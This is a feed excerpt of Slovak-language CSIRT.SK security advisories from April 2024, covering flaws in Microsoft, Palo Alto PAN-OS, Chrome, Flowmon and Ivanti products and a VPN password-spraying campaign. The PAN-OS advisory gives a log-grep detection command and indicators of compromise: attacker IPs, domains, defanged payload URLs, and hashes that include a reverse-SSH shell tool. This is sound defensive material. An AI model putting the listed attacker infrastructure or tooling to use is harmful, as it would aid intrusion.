										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/03/Windows_10_konci_podpora-1.png" alt="" /></p>
<p><strong>Spoločnosť Microsoft vydala v&nbsp;apríli 2024 balík opráv pre operačné systémy Windows opravujúcich 149 zraniteľností, z&nbsp;ktorých 67 umožňuje vzdialené vykonávanie kódu. Dve zraniteľnosti sú typu zero-day a&nbsp;boli zaznamenané ako aktívne zneužívané.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Windows,<strong> </strong></li>



<li>Office,<strong> </strong></li>



<li>Azure,</li>



<li>.NET Framework<strong>, </strong></li>



<li>Visual Studio, </li>



<li>SQL Server,<strong> </strong></li>



<li>DNS Server<strong>, </strong></li>



<li>Windows Defender,<strong> </strong></li>



<li>Bitlocker, </li>



<li>Windows Secure Boot.</li>
</ul>



<p><strong>Spoločnosť Microsoft opravila v rámci svojho pravidelného balíka aktualizácií Patch Tuesday 149 zraniteľností, z toho sú 3 kritické a 2 zero-day. Najzávažnejšie zraniteľnosti umožňujú eskaláciu oprávnení, vykonávanie kódu, únik informácií, či obchádzanie bezpečnostných prvkov. Zero-day zraniteľnosti </strong><strong>CVE-2024-29988 a CVE-2024-26234 sú aktívne zneužívané.</strong></p>



<p><strong>CVE-2024-29988 </strong>(CVSS skóre 8,8)</p>



<p>Vysoko závažná zraniteľnosť CVE-2024-29988 umožňuje útočníkom <strong>obísť bezpečnostnú</strong> funkciu Windows SmartScreen a&nbsp;spustiť špeciálne pripravený škodlivý súbor. <strong>Chyba bola aktívne zneužívaná hackerskou skupinou Water Hydra.</strong></p>



<p><strong>CVE-2024-26234 </strong>(CVSS skóre 6,7)</p>



<p>Zero day zraniteľnosť CVE-2024-26234 umožňuje <strong>falšovanie/predstieranie identity</strong>. Bola odhalená vďaka analýze podozrivého ovládača proxy servera, ktorý v&nbsp;skutočnosti slúžil ako zadné vrátka. Škodlivý ovládač bol podpísaný prostredníctvom platného certifikátu Microsoft Windows Hardware Compatibility Publisher (WHCP). Túto chybu nahlásil do Redmondu Christopher Budd zo spoločnosti Sophos.</p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Obídenie bezpečnostných prvkov</strong></li>



<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Falšovanie identity</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladné nasadenie aprílového balíka opráv na zraniteľné produkty spoločnosti Microsoft nájdete </strong><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Mar">tu</a><strong>.</strong><strong></strong></p>



<p><strong>Zdroje:</strong></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-29988">https://nvd.nist.gov/vuln/detail/CVE-2024-29988</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-26234">https://nvd.nist.gov/vuln/detail/CVE-2024-26234</a></p>



<p><a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-two-windows-zero-days-exploited-in-malware-attacks/">https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-two-windows-zero-days-exploited-in-malware-attacks/</a></p>



<p><a href="https://thehackernews.com/2024/04/microsoft-fixes-149-flaws-in-huge-april.html">https://thehackernews.com/2024/04/microsoft-fixes-149-flaws-in-huge-april.html</a></p>



<p><a href="https://krebsonsecurity.com/2024/04/aprils-patch-tuesday-brings-record-number-of-fixes/">https://krebsonsecurity.com/2024/04/aprils-patch-tuesday-brings-record-number-of-fixes/</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností marec 2024</title>
		<link>/posts/805</link>
					<comments>/posts/805#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Sun, 14 Apr 2024 21:47:05 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<guid isPermaLink="false">/?p=805</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci marec 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci marec 2024.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/04/2024_03_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/04/2024_03_mesacnik.pdf" target="_blank" rel="noreferrer noopener">Mesačný prehľad – 03/2024 PDF (264 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softverovych-zranitelnosti" target="_blank" rel="noreferrer noopener">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/805/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačná správa CSIRT.SK – Marec 2024</title>
		<link>/posts/801</link>
					<comments>/posts/801#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Sun, 14 Apr 2024 21:45:23 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<guid isPermaLink="false">/?p=801</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci marec 2024....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/prehlad_zranitelnosti-1.jpg" alt="" /></p>
<p><strong>V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci marec 2024. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.</strong></p>



<p>CSIRT.SK ako vládna jednotka na riešenie počítačových incidentov monitoruje lokálne aj globálne dianie v rámci informačnej bezpečnosti. Štandardne tento príspevok prináša prehľad udalostí a informácií zozbieraných jednotkou CSIRT.SK pri svojej činnosti. </p>



<p><a href="https://csirt.sk/wp-content/uploads/2024/04/MS2024-03.pdf" data-type="link" data-id="/wp-content/uploads/2024/04/MS2024-03.pdf" target="_blank" rel="noreferrer noopener">Mesačná správa – 03/2024 PDF (1,05 MB)</a></p>



<p>Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti <a href="https://csirt.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas" data-type="link" data-id="/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas">Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás</a><a href="https://www.csirt.gov.sk/mesacna-sprava-csirt-sk-a-prehlad-bezpecnostnych-udalosti-vo-svete-a-u-nas.html?csrt=4087702320029811072">.</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/801/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v softvéri Palo Alto PAN-OS</title>
		<link>/posts/798</link>
					<comments>/posts/798#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Sat, 13 Apr 2024 20:45:25 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Palo Alto]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=798</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/04/PaloAltoNetworks.webp" alt="" /></p>Spoločnosť Palo Alto Networks vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosti v&#160;softvéri PAN-OS. Verzie 10.2, 11.0 a 11.1...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/04/PaloAltoNetworks.webp" alt="" /></p>
<p><strong>Spoločnosť Palo Alto Networks vydala bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosti v&nbsp;softvéri PAN-OS. Verzie 10.2, 11.0 a 11.1 vo funkcii GlobalProtect obsahujú zraniteľnosť, ktorá umožňuje vzdialené vykonanie kódu. Zraniteľnosť je možné zneužiť len na firewalloch, na ktorých je zapnutá aspoň jedna z&nbsp;funkcií GlobalProtect Gateway alebo&nbsp;GlobalProtect Portal.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>PAN-OS 10.2 vo verzii staršej ako 10.2.0-h3, 10.2.1-h2, 10.2.2-h5, 10.2.3-h13, 10.2.4-h16, 10.2.5-h6, 10.2.6-h3, 10.2.7-h8, 10.2.8-h3, 10.2.9-h1</li>



<li>PAN-OS 11.0 vo verzii staršej ako 11.0.0-h3, 11.0.1-h4, 11.0.2-h4, 11.0.3-h10, 11.0.4-h1</li>



<li>PAN-OS 11.1 vo verzii staršej ako 11.1.0-h3, 11.1.1-h1, 11.1.2-h3</li>



<li><strong>zraniteľnosť je možné zneužiť len na firewalloch, na ktorých je zapnutá aspoň jedna z funkcií GlobalProtect Gateway alebo GlobalProtect Portal </strong>(podľa nových informácií zneužitie zraniteľnosti nevyžadovalo zapnutie funkcie telemetrie ako sa pôvodne predpokladalo)</li>



<li><strong>zariadenia Cloud NGFW, Panorama appliances a Prisma Access nie sú touto zraniteľnosťou ovplyvnené</strong></li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p>CVE-2024-3400 (CVSS skóre 10.0)</p>



<p><strong>Kritická zraniteľnosť</strong> s&nbsp;označením CVE-2024-3400 sa nachádza vo funkcii GlobalProtect, spočíva v&nbsp;nesprávnej neutralizácii špeciálnych prvkov v&nbsp;rámci príkazov a&nbsp;<strong>vzdialený neautentifikovaný útočník</strong> by ju mohol zneužiť na <strong>vykonanie škodlivého kódu.</strong>&nbsp; <strong>Zraniteľnosť je v&nbsp;súčasnosti aktívne zneužívaná útočníkmi.</strong></p>



<p><strong>Závažnosť zraniteľnosti: Kritická</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Vykonanie škodlivého kódu</li>



<li>Úplné narušenie dôvernosti, integrity a dostupnosti systému</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Výrobca odporúča bezodkladne aktualizovať zraniteľné systémy.</strong> V&nbsp;prípade, že aktualizáciu systémov nie je možné vykonať, odporúčame postupovať podľa pokynov výrobcu:</p>



<ul>
<li>Blokovať útoky a pokusy o&nbsp;zneužitie zraniteľnosti zapnutím signatúr ID hrozieb: 95187, 95189 a 95191 (len používatelia s&nbsp;aktívnym predplatným služby Threat Prevention).</li>



<li>Aplikovať profil ochrany pred zraniteľnosťou na rozhraniach GlobalProtect podľa <a href="https://live.paloaltonetworks.com/t5/globalprotect-articles/applying-vulnerability-protection-to-globalprotect-interfaces/ta-p/340184">návodu</a>.</li>
</ul>



<p><strong>Vzhľadom na aktívne zneužívanie zraniteľnosti odporúčame dôkladne preveriť prítomnosť dostupných indikátorov kompromitácie (IOC) v&nbsp;logoch sieťových a&nbsp;bezpečnostných prvkov.</strong></p>



<p>Pokusy o&nbsp;zneužitie zraniteľnosti na firewalloch možno preveriť pomocou príkazového riadka PAN-OS CLI zadaním príkazu:</p>



<p><em>grep pattern &#8220;failed to unmarshal session(.\+.\/&#8221; mp-log gpsvc.log*</em></p>



<p>Ak výsledky vyhľadávania medzi časťami „session(“ a „)“ obsahujú namiesto GUID, reťazce obsahujúce systémové cesty alebo shell-ové príkazy, môže sa jednať o&nbsp;aktivitu spojenú s&nbsp;pokusmi o&nbsp;zneužitie zraniteľnosti.</p>



<p><strong>Indikátory kompromitácie (IOC):</strong></p>



<p><strong>SHA256 hashe súborov:</strong></p>



<ul>
<li>3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac (Update.py)</li>



<li>5460b51da26c060727d128f3b3d6415d1a4c25af6a29fef4cc6b867ad3659078 (Update.py)</li>



<li>35a5f8ac03b0e3865b3177892420cb34233c55240f452f00f9004e274a85703c (patch)</li>



<li>755f5b8bd67d226f24329dc960f59e11cb5735b930b4ed30b2df77572efb32e8 (policy)</li>



<li>adba167a9df482aa991faaa0e0cde1182fb9acfbb0dc8d19148ce634608bab87 (policy)</li>



<li>c1a0d380bf55070496b9420b970dfc5c2c4ad0a598083b9077493e8b8035f1e9 (policy)</li>



<li>fe07ca449e99827265ca95f9f56ec6543a4c5b712ed50038a9a153199e95a0b7 (policy)</li>



<li>96dbec24ac64e7dd5fef6e2c26214c8fe5be3486d5c92d21d5dcb4f6c4e365b9 (policy)</li>



<li>448fbd7b3389fe2aa421de224d065cea7064de0869a036610e5363c931df5b7c (gost-linux-amd64)</li>



<li>e315907415eb8cfcf3b6a4cd6602b392a3fe8ee0f79a2d51a81a928dbce950f8 (policy(6))</li>



<li>161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6 (reverse-sshx64)</li>
</ul>



<p><strong>IP adresy:</strong></p>



<ul>
<li>38.60.218[.]153</li>



<li>38.180.41[.]251</li>



<li>38.180.106[.]167</li>



<li>38.180.128[.]159</li>



<li>38.181.70[.]3</li>



<li>38.207.148[.]123</li>



<li>45.121.51[.]23</li>



<li>64.176.226[.]203</li>



<li>66.235.168[.]222</li>



<li>78.141.232[.]174</li>



<li>110.47.250[.]103</li>



<li>126.227.76[.]24</li>



<li>146.70.192[.]174</li>



<li>144.172.79[.]92</li>



<li>147.45.70[.]100</li>



<li>149.28.194[.]95</li>



<li>149.88.27[.]212</li>



<li>154.223.16[.]34</li>



<li>172.233.228[.]93</li>



<li>173.255.223[.]159</li>



<li>185.108.105[.]110</li>



<li>199.119.206[.]28</li>



<li>203.160.86[.]91</li>
</ul>



<p><strong>Domény:</strong></p>



<ul>
<li>edcjn.57fe6f5d9d.ipv6.1433.eu[.]org</li>



<li>nhdata.s3-us-west-2.amazonaws[.]com</li>



<li>srgsd1f.842b727ba4.ipv6.1433.eu[.]org</li>
</ul>



<p>URL:</p>



<ul>
<li>hxxp://172.233.228[.]93/patch</li>



<li>hxxp://172.233.228[.]93/policy</li>



<li>hxxp://172.233.228[.]93/vpn_prot.gz</li>



<li>hxxp://172.233.228[.]93/vpn.log</li>



<li>hxxp://172.233.228[.]93/lowdp</li>



<li>hxxps://45.121.51[.]2/abc.txt</li>
</ul>



<p><strong><em>Aktualizované 19.04.2024: dostupné aktualizácie, predpoklady zneužitia zraniteľnosti, zoznam zasiahnutých systémov, odporúčania</em></strong></p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://security.paloaltonetworks.com/CVE-2024-3400">https://security.paloaltonetworks.com/CVE-2024-3400</a></p>



<p><a href="https://unit42.paloaltonetworks.com/cve-2024-3400/">https://unit42.paloaltonetworks.com/cve-2024-3400/</a></p>



<p><a href="https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/">https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/798/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zero day zraniteľnosť Google Chrome</title>
		<link>/posts/788</link>
					<comments>/posts/788#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 10 Apr 2024 11:55:25 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[access to sensitive information]]></category>
		<category><![CDATA[DoS]]></category>
		<guid isPermaLink="false">/?p=788</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>Spoločnosť Google vydala bezpečnostné aktualizácie na opravu jednej zero-day a&#160;troch vysoko závažných zraniteľností vo webovom prehliadači Chrome. Zraniteľnosti boli objavené...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>
<p><strong>Spoločnosť Google vydala bezpečnostné aktualizácie na opravu jednej zero-day a&nbsp;troch vysoko závažných zraniteľností vo webovom prehliadači Chrome. Zraniteľnosti boli objavené počas hackerskej súťaže Pwn20wn Vancouver 2024.</strong><strong></strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<p>Google Chrome (Windows/Mac) staršie ako 123.0.6312.105./106/.107, 123.0.6312.105 (Linux)</p>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-3159</strong></p>



<p><strong>Zero day zraniteľnosť</strong><strong> CVE-2024-3159 sa nachádza v&nbsp;komponente V8 (nástroj JavaScript) a umožňuje </strong><strong>čítať mimo povolené hranice pamäte</strong><strong>. </strong>Úspešné zneužitie umožňuje <strong>vzdialenému útočníkovi</strong> získať <strong>prístup k citlivým údajom a môže viesť k pádu aplikácie</strong>, prostredníctvom poškodenia haldy.<strong></strong></p>



<p><strong>CVE-2024-3156</strong></p>



<p><strong>Vysoko závažná zraniteľnosť CVE-2024-3156 komponentu V8 umožňuje </strong><strong>vzdialenému</strong><strong> </strong><strong>útočníkovi</strong><strong> </strong><strong>pristupovať mimo povolené hranice pamäte</strong><strong>. Chyba sa </strong><strong>týka nesprávnej implementácie a úspešné zneužitie je možné prostredníctvom vytvorenia škodlivej HTML stránky</strong><strong>. Zraniteľnosť nahlásil Zhenghang Xiao.</strong></p>



<p><strong>CVE-2024-3158</strong></p>



<p><strong>Zraniteľnosť CVE-2024-3158 v&nbsp;module záložiek (Bookmarks) </strong><strong>umožňuje použiť dealokované miesto v&nbsp;pamäti</strong><strong> prehliadača Chrome. Vďaka nej môže útočník vyvolať </strong><strong>poškodenie haldy pomocou škodlivej HTML stránky. </strong><strong>Na chybu poukázal undoingfish.</strong><strong></strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Pád aplikácie</li>



<li>Únik citlivých informácií</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p><strong>Bezodkladná aktualizácia</strong><strong> </strong>Google Chrome pre Windows/Mac aspoň na verziu 123.0.6312.106/.107 a&nbsp;Linux aspoň na verziu 123.0.6312.105 .</p>



<p><strong>Odkazy:</strong></p>



<p><a href="https://www.bleepingcomputer.com/news/security/google-fixes-one-more-chrome-zero-day-exploited-at-pwn2own/">https://www.bleepingcomputer.com/news/security/google-fixes-one-more-chrome-zero-day-exploited-at-pwn2own/</a></p>



<p><a href="https://securityaffairs.com/161445/hacking/google-chrome-zero-day-pwn2own.html">https://securityaffairs.com/161445/hacking/google-chrome-zero-day-pwn2own.html</a></p>



<p><a href="https://cybersecuritynews.com/chrome-zero-day-exploit-patch/">https://cybersecuritynews.com/chrome-zero-day-exploit-patch/</a></p>



<p><a href="https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop.html">https://chromereleases.googleblog.com/2024/04/stable-channel-update-for-desktop.html</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-3158">https://nvd.nist.gov/vuln/detail/CVE-2024-3158</a></p>



<p><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-3156">https://nvd.nist.gov/vuln/detail/CVE-2024-3156</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/788/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v platforme Flowmon</title>
		<link>/posts/785</link>
					<comments>/posts/785#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 10 Apr 2024 11:54:02 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[ACE]]></category>
		<category><![CDATA[flowmon]]></category>
		<category><![CDATA[Unauthorized access]]></category>
		<guid isPermaLink="false">/?p=785</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/04/flowmon.png" alt="" /></p>Spoločnosť Progress vydala bezpečnostné aktualizácie platformy Flowmon pre meranie výkonnosti siete a&#160;bezpečnosti. Verzie staršie ako 11.1.14 a 12.3.5 obsahujú kritickú...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/04/flowmon.png" alt="" /></p>
<p><strong>Spoločnosť Progress vydala bezpečnostné aktualizácie platformy Flowmon pre meranie výkonnosti siete a&nbsp;bezpečnosti. Verzie staršie ako 11.1.14 a 12.3.5 obsahujú kritickú bezpečnostnú zraniteľnosť, ktorá umožňuje vzdialené vykonanie systémových príkazov.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Flowmon vo verz.&nbsp;&nbsp;12.x&nbsp;&nbsp;staršie ako 12.3.5</li>



<li>Flowmon vo verz.&nbsp;&nbsp;11.x&nbsp;&nbsp;staršie ako 11.1.14&nbsp;</li>



<li><strong>Všetky&nbsp;verzie&nbsp;Flowmon&nbsp;staršie ako&nbsp;11.0 (10.x a nižšie)&nbsp;nie sú touto zraniteľnosťou ovplyvnené.</strong></li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-2389 (CVSS skóre </strong><strong>10</strong><strong>)</strong></p>



<p><strong>Kritická zraniteľnosť</strong> s&nbsp;označením <strong>CVE-2024-2389</strong> umožňuje vzdialenému neautentifikovanému útočníkovi získať <strong>prístup k webovému manažmentovému rozhraniu Flowmon</strong> a&nbsp;následne <strong>prostredníctvom špeciálne vytvoreného API príkazu vykonávať ľubovoľné systémové príkazy bez autentifikácie.</strong></p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Kritická</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup do systému</strong></li>



<li><strong>Vykonanie škodlivého kódu</strong></li>



<li><strong>Úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<ul>
<li>Bezodkladne vykonať aktualizáciu zasiahnutých systémov na verzie 12.3.5, 11.1.14 a&nbsp;vyššie.</li>



<li>Aktualizovať všetky zásuvné moduly Flowmon.</li>
</ul>



<p><strong>Odkazy:</strong></p>



<p><a href="https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability">https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability</a></p>



<p><a href="https://www.cve.org/CVERecord?id=CVE-2024-2389">https://www.cve.org/CVERecord?id=CVE-2024-2389</a></p>



<p><a href="https://socradar.io/command-injection-flaw-progress-flowmon-cve-2024-2389">https://socradar.io/command-injection-flaw-progress-flowmon-cve-2024-2389</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/785/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Bezpečnostné zraniteľnosti v produktoch Ivanti</title>
		<link>/posts/783</link>
					<comments>/posts/783#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 10 Apr 2024 11:47:53 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[ACE]]></category>
		<category><![CDATA[DoS]]></category>
		<guid isPermaLink="false">/?p=783</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/Ivanti-1024x576.webp" alt="" /></p>Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 4 bezpečnostné zraniteľnosti v&#160;produktoch Connect Secure a Policy Secure. Najzávažnejšie zraniteľnosti s&#160;označením CVE-2024-21894...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/Ivanti-1024x576.webp" alt="" /></p>
<p><strong>Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 4 bezpečnostné zraniteľnosti v&nbsp;produktoch Connect Secure a Policy Secure. Najzávažnejšie zraniteľnosti s&nbsp;označením CVE-2024-21894 a CVE-2024-22053 možno zneužiť na zneprístupnenie služby a&nbsp;vzdialené vykonanie škodlivého kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Connect Secure vo verzii 9.x, 22.x</li>



<li>Policy Secure vo verzii 9.x, 22.x</li>



<li><strong>Kompletnú špecifikáciu zasiahnutých verzií nájdete na </strong><a href="https://forums.ivanti.com/s/article/Granular-Software-Release-EOL-Timelines-and-Support-Matrix?language=en_US" target="_blank" rel="noreferrer noopener"><strong>stránke výrobcu</strong></a><strong>.</strong></li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2024-21894 (CVSS skóre </strong><strong>8,2</strong><strong>), CVE-2024-22053 (CVSS skóre </strong><strong>8,2&nbsp;</strong><strong>)</strong></p>



<p><strong>Najzávažnejšie zraniteľnosti vedúce k&nbsp;pretečeniu haldy sa nachádzajú v&nbsp;komponente IPsec a </strong>&nbsp;vzdialenému neautentifikovanému <strong>útočníkovi</strong> <strong>umožňujú prostredníctvom zaslania špeciálne vytvorenej požiadavky spôsobiť zneprístupnenie služby, neopravený prístup k&nbsp;obsahu pamäte</strong> a&nbsp;za istých podmienok <strong>môžu viesť k&nbsp;vykonaniu škodlivého kódu</strong>.</p>



<p><strong>CVE-2024-22052 (CVSS skóre 7</strong><strong>,5</strong><strong>), CVE-2024-22023 (CVSS skóre </strong><strong>5,3</strong><strong>)</strong><strong></strong></p>



<p><strong>Zraniteľnosti CVE-2024-22052 </strong>a<strong> CVE-2024-22023</strong> nachádzajúce sa v&nbsp;komponentoch IPsec a&nbsp;SAML umožňujú vzdialenému neautentifikovanému útočníkovi spôsobiť zneprístupnenie služby.</p>



<p><strong>Závažnosť zraniteľnosti:&nbsp;</strong>Vysoko závažná</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li>Zneprístupnenie služby</li>



<li>Vykonanie škodlivého kódu</li>
</ul>



<p><strong>Odporúčania:</strong></p>



<ul>
<li>Bezodkladne vykonať aktualizáciu zasiahnutých systémov na najnovšie verzie špecifikované <a href="https://forums.ivanti.com/s/article/Granular-Software-Release-EOL-Timelines-and-Support-Matrix?language=en_US" target="_blank" rel="noreferrer noopener">výrobcom</a>.</li>
</ul>



<p><strong>Odkazy:</strong></p>



<p><a href="https://forums.ivanti.com/s/article/SA-CVE-2024-21894-Heap-Overflow-CVE-2024-22052-Null-Pointer-Dereference-CVE-2024-22053-Heap-Overflow-and-CVE-2024-22023-XML-entity-expansion-or-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US">https://forums.ivanti.com/s/article/SA-CVE-2024-21894-Heap-Overflow-CVE-2024-22052-Null-Pointer-Dereference-CVE-2024-22053-Heap-Overflow-and-CVE-2024-22023-XML-entity-expansion-or-XXE-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US</a></p>



<p><a href="https://forums.ivanti.com/s/article/Granular-Software-Release-EOL-Timelines-and-Support-Matrix?language=en_US">https://forums.ivanti.com/s/article/Granular-Software-Release-EOL-Timelines-and-Support-Matrix?language=en_US</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/783/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Útoky „Brutus“ zamerané na služby VPN</title>
		<link>/posts/769</link>
					<comments>/posts/769#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 08 Apr 2024 07:11:37 +0000</pubDate>
				<category><![CDATA[Aktualita]]></category>
		<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[password spraying]]></category>
		<category><![CDATA[VJ CSIRT]]></category>
		<category><![CDATA[VPN campaign]]></category>
		<guid isPermaLink="false">/?p=769</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>Spoločnosť Cisco nedávno upozornila na rozsiahlu kampaň zameranú na pokusy o&#160;prihlásenie sa jedným heslom do rôznych účtov naprieč zákazníkmi, ktorí...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/csirt-1.png" alt="" /></p>
<p><strong>Spoločnosť Cisco nedávno upozornila na rozsiahlu kampaň zameranú na pokusy o&nbsp;prihlásenie sa jedným heslom do rôznych účtov naprieč zákazníkmi, ktorí využívajú Cisco VPN. Pokusy o&nbsp;prihlásenie boli zaznamenané do služby VPN so vzdialeným prístupom (RAVPN) nakonfigurované v zariadeniach Cisco Secure Firewall. Útoky sa zrejme zameriavajú aj na iné služby VPN a zatiaľ nie je jasné, či sú súčasťou prieskumnej činnosti alebo cieleného útoku. Bezpečnostní výskumníci Aaron Martin a Chris Grube zverejnili informácie, že táto aktivita môže súvisieť s botnetom „Brutus“, ktorý v súčasnosti využíva viac ako 20 000 IP adries po celom svete.</strong></p>



